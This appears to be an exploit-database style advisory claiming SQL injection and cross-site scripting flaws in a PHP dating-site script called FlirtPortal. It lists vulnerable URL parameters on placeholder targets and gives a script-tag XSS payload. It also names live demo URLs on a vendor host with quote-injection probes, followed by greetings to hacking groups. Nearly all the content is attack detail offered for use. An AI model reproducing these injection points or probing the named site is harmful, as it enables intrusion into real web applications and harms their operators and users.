########################################################################################
#                                                                                      #
# Exploit Title : FlirtPortal Script Multiple Vulnerabilities                          #
#                                                                                      #
# Author        : Secure-Land Security Team                                            #
#                                                                                      #
# Discovered By : farbodmahini                                                         #
#                                                                                      #
# Home          : Secure-Land.net                                                      #
#                                                                                      #
# Version       : All Version                                                          #
#                                                                                      #
# Demo          : www.scripte24shop.de/demo/flirtportal                                #
#                                                                                      #
# Contact       : farbodmahini@yahoo.fr , farbodmahini@gmail.com                       #
#                                                                                      #
# Security Risk : High                                                                 #
#                                                                                      #
#                                                                                      #
########################################################################################
#                                                                                      #
#  Expl0iT:                                                                            #
#                                                                                      #
#  ~[SQL]  :                                                                           #
#                                                                                      #
#  http://[TarGeT]/rub.php?rub=[SQL]                                                   #
#  http://[TarGeT]/rub2.php?rub=[SQL]                                                  #
#  http://[TarGeT]/index_start.php?trefferid=[SQL]                                     #
#                                                                                      #
#  ~[XSS]  :                                                                           #
#                                                                                      #
#  http://[TarGeT]/index_kartensuche.php?ctitle=[XSS]                                  #
#                                                                                      #
#  +XSS : <script>alert(/farbodmahini/)</script>                                       #
#                                                                                      #
#                                                                                      #
#  Demo :                                                                              #
#                                                                                      #
#  www.scripte24shop.de/demo/flirtportal/index_kartensuche.php?ctitle=[XSS]            #
#  http://www.scripte24shop.de/demo/flirtportal/index_start.php?trefferid=8'           #
#  http://www.scripte24shop.de/demo/flirtportal/rub2.php?rub=3'                        #
#  http://www.scripte24shop.de/demo/flirtportal/rub.php?rub=4'                         #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us                                  #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id              #
#                                                                                      #
########################################################################################